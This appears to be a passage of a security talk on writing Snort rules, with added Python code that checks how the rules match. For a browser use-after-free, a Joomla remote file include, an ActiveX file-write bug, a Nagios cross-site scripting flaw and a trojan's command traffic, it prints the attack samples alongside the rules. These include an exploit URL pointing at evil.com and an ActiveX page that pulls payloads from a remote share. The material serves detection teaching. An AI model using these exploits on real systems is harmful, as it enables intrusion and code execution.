    eax=41414141 ebx=6799799c ecx=679b6a14 edx=00000000 esi=00650d90 edi=021fcb34
    eip=679b6b61 esp=021fcb0c ebp=021fcb20 iopl=0         nv up ei pl zr na pe nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
    MSHTML!CTreeNode::GetInterface+0xd8:
    679b6b61 8b08            mov     ecx,dword ptr [eax]  ds:0023:41414141=????????
  • 58. Use-After-Free Detection
    alert tcp $EXTERNAL_NET $FILE_DATA_PORTS -> $HOME_NET any (
      msg:"BROWSER-IE Microsoft Internet Explorer onlosecapture memory corruption attempt";
      flow:to_client,established;
      file_data;
      content:".applyElement"; nocase;
      content:".onlosecapture"; nocase; within:500; fast_pattern;
      content:".setCapture"; nocase; within:500;
      content:".setCapture"; nocase; within:500;
      pcre:"/\.applyElement\s*\(\s*(?P<var>\w+)\s*\).*?(?P=var)\.onlosecapture.*?(?P=var)\.setCapture/si";
      metadata:service ftp-data, service http, service imap, service pop3;
      reference:cve,2013-3893;
    )
  • 59. Use-After-Free Detection
    alert tcp $EXTERNAL_NET any -> $SMTP_SERVERS 25 (
      msg:"BROWSER-IE Microsoft Internet Explorer onlosecapture memory corruption attempt";
      flow:to_server,established;
      file_data;
      content:".applyElement"; nocase;
      content:".onlosecapture"; nocase; within:500; fast_pattern;
      content:".setCapture"; nocase; within:500;
      content:".setCapture"; nocase; within:500;
      pcre:"/\.applyElement\s*\(\s*(?P<var>\w+)\s*\).*?(?P=var)\.onlosecapture.*?(?P=var)\.setCapture/si";
      metadata:service smtp;
      reference:cve,2013-3893;
    )
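The rule on slides 58 and 59 does two different things: the chain of `within:500` content matches establishes cheaply that the four method names appear in order and close together, and the pcre then ties them to one element through a named backreference, `(?P<var>\w+)` ... `(?P=var)`. The added example below (not the slides' code, not Snort) implements both steps in Python, whose `re` module understands the same named-group syntax, and runs them over the slide 56 trigger wrapped in a constructed page and over a constructed benign page that contains all four method names but on different elements.

```python
import re

# Added example (not the slides' code and not Snort): the ordered content
# checks and the backreference pcre from the CVE-2013-3893 rule, applied to
# constructed HTML in the role of Snort's file_data buffer.

UAF_RE = re.compile(
    rb"\.applyElement\s*\(\s*(?P<var>\w+)\s*\).*?(?P=var)\.onlosecapture.*?(?P=var)\.setCapture",
    re.S | re.I)

CHAIN = [b".applyelement", b".onlosecapture", b".setcapture", b".setcapture"]

def content_chain(data, patterns=CHAIN, within=500):
    """content:"X"; nocase; content:"Y"; nocase; within:500; ... Each later
    pattern must lie entirely within `within` bytes after the previous match."""
    low = data.lower()
    idx = low.find(patterns[0])
    if idx < 0:
        return False
    doe = idx + len(patterns[0])
    for pat in patterns[1:]:
        idx = low.find(pat, doe, doe + within)
        if idx < 0:
            return False
        doe = idx + len(pat)
    return True

def uaf_alert(file_data):
    """Cheap ordered content checks first, then the pcre, which additionally
    requires applyElement's argument to be the element whose onlosecapture
    handler and setCapture call follow."""
    return content_chain(file_data) and UAF_RE.search(file_data) is not None

# the trigger from slide 56 inside a constructed page
TRIGGER_PAGE = b"""<html><body><script>
function trigger() {
  var id_0 = document.createElement("sup");
  var id_1 = document.createElement("audio");
  document.body.appendChild(id_0);
  document.body.appendChild(id_1);
  id_1.applyElement(id_0);
  id_0.onlosecapture=function(e) { document.write(""); }
  id_0.setCapture();
  id_1.setCapture();
}
</script></body></html>"""

# constructed benign page: same method names, different elements
BENIGN_PAGE = b"""<html><body><script>
  a.applyElement(b);
  c.onlosecapture = function () { cleanup(); };
  a.setCapture(); a.setCapture();
</script></body></html>"""

if __name__ == "__main__":
    print(uaf_alert(TRIGGER_PAGE))   # True
    print(content_chain(BENIGN_PAGE), uaf_alert(BENIGN_PAGE))   # True False
```

The benign page passes the content chain and fails only at the pcre, which is exactly the false-positive class the backreference is there to remove.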
  • 61. Detection Topics (current section: Remote File Include)
    Buffer Overflow, Command Injection, Directory Traversal, Use-After-Free, Remote File Include, Browser Plugins, Cross Site Scripting, Malware Command Traffic
  • 62. Remote File Include Overview
    CVE-2008-5053
    Remote file include vulnerability in Joomla Simple RSS Reader allows execution of arbitrary PHP code via the parameter mosConfig_live_site in administrator/components/com_rssreader/admin.rssreader.php:
    include("$mosConfig_live_site/components/com_rssreader/about.html");
    $mosConfig_live_site is obtained from the GET parameter of the same name sent to admin.rssreader.php.
    Exploit:
    http://site/joomlapath/administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://evil.com/
  • 63. Remote File Include Detection
    alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (
      msg:"SERVER-WEBAPP Joomla admin.rssreader.php remote file include attempt";
      flow:to_server,established;
      content:"admin.rssreader.php"; fast_pattern:only; http_uri;
      content:"mosConfig_live_site="; nocase; http_uri;
      pcre:"/[?&]mosConfig_live_site=[^&]*?(http|ftp)/Ui";
      metadata:service http;
      reference:cve,2008-5053;
      classtype:web-application-attack;
    )
  • 65. Detection Topics (current section: Browser Plugins)
    Buffer Overflow, Command Injection, Directory Traversal, Use-After-Free, Remote File Include, Browser Plugins, Cross Site Scripting, Malware Command Traffic
  • 66. Browser Plugin Overview
    CVE-2012-2516
    GE Proficy Historian's KeyHelp.ocx ActiveX control adds HTML Help functionality for the Proficy enterprise data collection system. It can be instantiated in a web page using the <object> tag, for example:
    <object id="ctrl" classid="clsid:45e66957-2932-432a-a156-31503df0a681">
    Or using Javascript:
    obj = new ActiveXObject("KeyHelp.KeyScript")
  • 67. Browser Plugin Overview
    The API of this ActiveX object exposes several methods including LaunchTriPane(), which has the following prototype:
    Void LaunchTriPane(System.string ChmFile)
    The function LaunchTriPane will use ShellExecute to launch hh.exe, with user controlled data as parameters:
    > HH.EXE -decompile D:/destination-folder C:/test.chm
    This can be abused to write arbitrary files. Code execution is possible by uploading a WMI .mof file.
  • 68. Browser Plugin Disassembly
    KeyHelp.ocx:
    5D335165  CALL KeyHelp.5D31797F
    5D33516A  JMP SHORT KeyHelp.5D33517D
    5D33516C  PUSH 5
    5D33516E  PUSH EDI
    5D33516F  PUSH ESI                     ; Malicious command line parameters - no validation
    5D335170  PUSH KeyHelp.5D347950        ; ASCII "hh.exe"
    5D335175  PUSH EDI
    5D335176  PUSH EDI
    5D335177  CALL SHELL32.ShellExecuteA   ; run hh.exe with malicious params
    5D33517D  CMP ESI,EDI
    5D33517F  JE SHORT KeyHelp.5D335187
    5D335181  PUSH ESI
  • 69. Browser Plugin Exploit
    <html>
    <body><script>
    KeyScript = new ActiveXObject("KeyHelp.KeyScript");
    ChmPayloadFile = "-decompile C:\\WINDOWS\\system32 " + "\\\\172.16.211.11\\A5vTb1QLAqfifDoixwWS.chm";
    ChmMofFile = "-decompile c:\\WINDOWS\\system32\\wbem\\mof " + "\\\\172.16.211.11\\A5vTb1QLAqfifQLQklKr.chm";
    KeyScript.LaunchTriPane(ChmPayloadFile);
    setTimeout('KeyScript.LaunchTriPane(ChmMofFile);', 3000);
    </script></body>
    </html>
  • 70. Browser Plugin Detection
    #
    # <OBJECT> Detection
    #
    alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (
      msg:"BROWSER-PLUGINS GE Proficy Historian KeyHelp ActiveX clsid access attempt";
      flow:to_client,established;
      file_data;
      content:"45E66957-2932-432A-A156-31503DF0A681"; fast_pattern:only;
      content:"LaunchTriPane"; nocase;
      metadata:policy security-ips drop, service http;
      reference:cve,2012-2516;
      classtype:attempted-user;
    )
  • 71. Browser Plugin Detection
    #
    # Javascript Detection
    #
    alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (
      msg:"BROWSER-PLUGINS GE Proficy Historian KeyHelp ActiveX clsid access attempt";
      flow:to_client,established;
      file_data;
      content:"KeyHelp.KeyScript"; fast_pattern:only;
      content:"LaunchTriPane"; nocase;
      metadata:policy security-ips drop, service http;
      reference:cve,2012-2516;
      classtype:attempted-user;
    )
  • 73. Detection Topics (current section: Cross Site Scripting)
    Buffer Overflow, Command Injection, Directory Traversal, Use-After-Free, Remote File Include, Browser Plugins, Cross Site Scripting, Malware Command Traffic
  • 74. Cross Site Scripting (XSS) Overview
    OSVDB-89893
    Cross-Site Scripting vulnerability in Nagios XI's Alert Cloud due to insufficient sanitization of 'width' and 'height' parameters sent to the URI:
    /includes/components/alertcloud/index.php
    Exploit:
    /nagiosxi/includes/components/alertcloud/index.php?height=4"}}; alert('XSS'); var aa={"A":{"B":"
  • 75. Cross Site Scripting (XSS) Detection
    alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (
      msg:"SERVER-WEBAPP Nagios XI alert cloud cross site scripting attempt";
      flow:to_server,established;
      content:"/includes/components/alertcloud/index.php"; fast_pattern:only; http_uri;
      pcre:"/[?&](height|width)=[^&]*?([\x22\x27\x3c\x3e\x28\x29]|script|onload|src)/Ui";
      metadata:service http;
      reference:url,osvdb.org/show/osvdb/89893;
      classtype:web-application-attack;
    )
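The remote file include rule on slide 63 and the cross site scripting rule on slide 75 share one shape: a fast_pattern on the script path, then a pcre that anchors on `[?&]name=` and inspects only that parameter's value. The added example below (not from the slides, not Snort code) applies both regexes to constructed request URIs; percent-decoding stands in for Snort's normalized `http_uri` buffer, which is an assumption about http_inspect rather than its documented behaviour.

```python
import re
from urllib.parse import unquote

# Added example, not part of the slides and not Snort code: the parameter
# value pcre checks from the RFI rule (slide 63) and the Nagios XI XSS rule
# (slide 75) over constructed URIs.

RFI_RE = re.compile(rb"[?&]mosConfig_live_site=[^&]*?(http|ftp)", re.I)
XSS_RE = re.compile(
    rb"[?&](height|width)=[^&]*?([\x22\x27\x3c\x3e\x28\x29]|script|onload|src)", re.I)

def normalize_uri(raw_uri):
    """Simplified stand-in for the normalized http_uri buffer (/U flag)."""
    return unquote(raw_uri.decode("ascii", "replace")).encode("utf-8")

def rfi_alert(raw_uri):
    """fast_pattern on the script name, content on the parameter name, then
    the pcre: the parameter value must carry a remote URL scheme."""
    uri = normalize_uri(raw_uri)
    if b"admin.rssreader.php" not in uri or b"mosconfig_live_site=" not in uri.lower():
        return False
    return RFI_RE.search(uri) is not None

def xss_alert(raw_uri):
    """fast_pattern on the alert cloud path, then the pcre: a quote, angle
    bracket, parenthesis or script-like token inside height= or width=."""
    uri = normalize_uri(raw_uri)
    if b"/includes/components/alertcloud/index.php" not in uri:
        return False
    return XSS_RE.search(uri) is not None

RSS = b"/administrator/components/com_rssreader/admin.rssreader.php"
CLOUD = b"/nagiosxi/includes/components/alertcloud/index.php"

if __name__ == "__main__":
    # constructed URIs; evil.com is the host used on the overview slide
    print(rfi_alert(RSS + b"?mosConfig_live_site=http://evil.com/"))        # True
    print(rfi_alert(RSS + b"?mosConfig_live_site=/var/www/site"))          # False
    print(xss_alert(CLOUD + b"?height=4%22%7D%7D%3B%20alert(%27XSS%27)"))  # True
    print(xss_alert(CLOUD + b"?height=400&width=600"))                     # False
```

Because `[^&]*?` cannot cross a parameter separator, a suspicious value in some other parameter (`?width=100&foo=<script>`) does not fire the XSS check, which is what keeps the rule specific to the two parameters the advisory names.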
  • 77. Detection Topics (current section: Malware Command Traffic)
    Buffer Overflow, Command Injection, Directory Traversal, Use-After-Free, Remote File Include, Browser Plugins, Cross Site Scripting, Malware Command Traffic
  • 78. Malware Sample Overview
    Win.Trojan.Sefnit
    Upon execution Win.Trojan.Sefnit drops a service to %AppData%\Updater\updater.dll and starts it. When the service updater.dll starts it attempts to read tasks from the configuration file %AppData%\Updater/~conf.dat. Initially the conf.dat file doesn't exist.
    The sample obtains the Disk Volume Serial number and appends it to the MachineGUID. This string is then encrypted. The sample uses 16 bytes of the encrypted value and converts it to a 32 character hex string and uses this string as a UUID sent in the initial request to C2:
    GET /j/20a0b8237d5b084e46bd673e26d948bf/0001 HTTP/1.1
    Host: axnlze.net
    Accept: */*
    The URI above has the following hardcoded format:
    hxxp://<c2domain>/j/<uuid>/<version>
  • 79. Malware Sample Disassembly
    10015B27  PUSH 10112E28                   ; /Arg1 = UNICODE "c2.net/j/<uuid>/<version>"
    10015B2C  LEA ECX,DWORD PTR SS:[EBP-4C]   ; |
    10015B2F  CALL <_wcslen-copystr>          ; updater.10001BA4
    10015B34  MOV BYTE PTR SS:[EBP-4],1
    10015B38  MOV EDI,10112E14                ; UNICODE "<uuid>"
    10015B3D  PUSH EDI                        ; /Arg1 => 10112E14
    10015B3E  CALL <_wcslen>                  ; updater.100196E1
    ...
    10015BBB  PUSH ESI                        ; UNICODE "<version>"
    10015BBC  LEA ECX,DWORD PTR SS:[EBP-4C]
    10015BBF  CALL <substr_loc>
    10015BC4  MOV DWORD PTR SS:[EBP-1DC],EAX
    10015BCA  PUSH ESI                        ; UNICODE "<version>"
    10015BCB  CALL <_wcslen>
    10015BD0  MOV DWORD PTR SS:[EBP-1EC],EAX
    10015BD6  MOV EDI,10112E08                ; UNICODE "0001"
    ...
    1005A043  PUSH 0                          ; /Arg4 = 00000000
    1005A045  PUSH ECX                        ; |Arg3 = 008DAA60 ASCII "/j/20a0b8237d5b084e46bd673e26d948bf/0001"
    1005A046  PUSH EBX                        ; |Arg2 = 1011B340 ASCII "GET"
    1005A047  PUSH EDI                        ; |Arg1 008C9138 = NULL
    1005A048  CALL 10058E00                   ; updater.10058E00
  • 80. Malware Command Traffic Detection
    #
    # C2 request detection
    #
    # hardcoded urilen
    urilen:40,norm;
    # hardcoded uri pattern, begins with "/j/"
    content:"/j/"; depth:3; http_uri;
    # ends with "/0001"
    content:"/0001"; distance:32; within:5; http_uri;
    # no User-Agent in C2 request
    content:!"User-Agent"; http_header;
    # final verification of C2 URI pattern
    pcre:"/^\x2fj\x2f[a-f0-9]{32}\x2f0001$/U";
  • 81. Malware Command Traffic Detection
    alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (
      msg:"MALWARE-CNC Win.Trojan.Sefnit variant outbound connection attempt";
      flow:to_server,established;
      urilen:40,norm;
      content:"/j/"; depth:3; http_uri;
      content:"/0001"; within:5; distance:32; http_uri;
      content:!"User-Agent"; http_header;
      pcre:"/^\x2fj\x2f[a-f0-9]{32}\x2f0001$/U";
      metadata:impact_flag red, service http;
      classtype:trojan-activity;
    )
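The Sefnit rule on slides 80 and 81 is built entirely from structural facts about the hardcoded request: the URI length, the fixed prefix and suffix at fixed offsets, the absent User-Agent header, and a final regex. The added example below (not the slides' code, not Snort) parses a raw HTTP request just far enough to supply the `http_uri` and `http_header` buffers, evaluates each option separately so a miss can be attributed to one check, and runs it over the request from slide 78 plus constructed variants; the regex is the rule's own.

```python
import re

# Added example (not the slides' code, not Snort): the C2 request checks from
# the Sefnit rule applied to constructed HTTP requests.

C2_URI_RE = re.compile(rb"^\x2fj\x2f[a-f0-9]{32}\x2f0001$")

def parse_request(raw):
    """Split a raw HTTP request into (method, uri, headers). Header names
    are lower-cased so lookups are case-insensitive."""
    head = raw.split(b"\r\n\r\n", 1)[0]
    lines = head.split(b"\r\n")
    method, uri, _version = lines[0].split(b" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    return method, uri, headers

def sefnit_checks(raw):
    """One entry per rule option, so a miss can be attributed to a check."""
    method, uri, headers = parse_request(raw)
    return {
        "urilen:40": len(uri) == 40,
        'content:"/j/"; depth:3': uri[:3] == b"/j/",
        # distance:32 skips the 32-byte uuid after "/j/"; within:5 means
        # "/0001" has to sit exactly in the next 5 bytes
        'content:"/0001"; distance:32; within:5': uri[35:40] == b"/0001",
        'content:!"User-Agent"; http_header': b"user-agent" not in headers,
        "pcre": C2_URI_RE.search(uri) is not None,
    }

def sefnit_alert(raw):
    return all(sefnit_checks(raw).values())

# the request from the overview slide, followed by constructed variants
C2_REQUEST = (b"GET /j/20a0b8237d5b084e46bd673e26d948bf/0001 HTTP/1.1\r\n"
              b"Host: axnlze.net\r\nAccept: */*\r\n\r\n")
BROWSER_REQUEST = (b"GET /j/20a0b8237d5b084e46bd673e26d948bf/0001 HTTP/1.1\r\n"
                   b"Host: axnlze.net\r\nUser-Agent: Mozilla/5.0\r\nAccept: */*\r\n\r\n")
OTHER_VERSION = (b"GET /j/20a0b8237d5b084e46bd673e26d948bf/0002 HTTP/1.1\r\n"
                 b"Host: axnlze.net\r\n\r\n")
UPPERCASE_UUID = (b"GET /j/20A0B8237D5B084E46BD673E26D948BF/0001 HTTP/1.1\r\n"
                  b"Host: axnlze.net\r\n\r\n")

if __name__ == "__main__":
    for name, raw in [("c2", C2_REQUEST), ("browser", BROWSER_REQUEST),
                      ("version", OTHER_VERSION), ("uppercase", UPPERCASE_UUID)]:
        failed = [k for k, ok in sefnit_checks(raw).items() if not ok]
        print(name, sefnit_alert(raw), failed)
```

The uppercase variant passes every content check and fails only the pcre, which has no `i` flag; whether that strictness is wanted depends on how confident the analyst is that the sample always emits lowercase hex, a point worth confirming in the disassembly before shipping the rule.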
  • 82. Call to Action
    • Related sessions:
      • Introduction to Snort Rule Writing
      • Detection Strategies with Snort [DevNet-1126]
    • Visit the World of Solutions for
      • Cisco Campus
      • Walk in Labs
      • Technical Solution Clinics
      • Meet the Engineer - Available immediately after this talk.